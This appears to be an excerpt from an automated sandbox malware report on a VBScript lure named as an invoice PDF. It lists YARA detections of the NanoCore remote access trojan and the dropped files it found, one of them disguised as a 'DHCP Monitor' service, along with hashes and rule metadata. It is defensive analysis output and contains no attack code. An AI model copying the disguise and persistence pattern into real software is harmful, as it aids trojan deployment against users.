            Source: Yara matchFile source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_0234131A NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023412DF NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_0004524A
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E2FA8
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E23A0
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E8788
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E3850
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022EB56A
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E969B
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E9388
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E306F
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E944F
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_00C4524A
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_05433850
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_054323A0
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_05432FA8
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 7_2_0543306F
            Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ame.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fi.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Notepads.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
            Source: Invoice No F1019855_PDF.vbsInitial sample: Strings found which are bigger than 50
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPEDMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
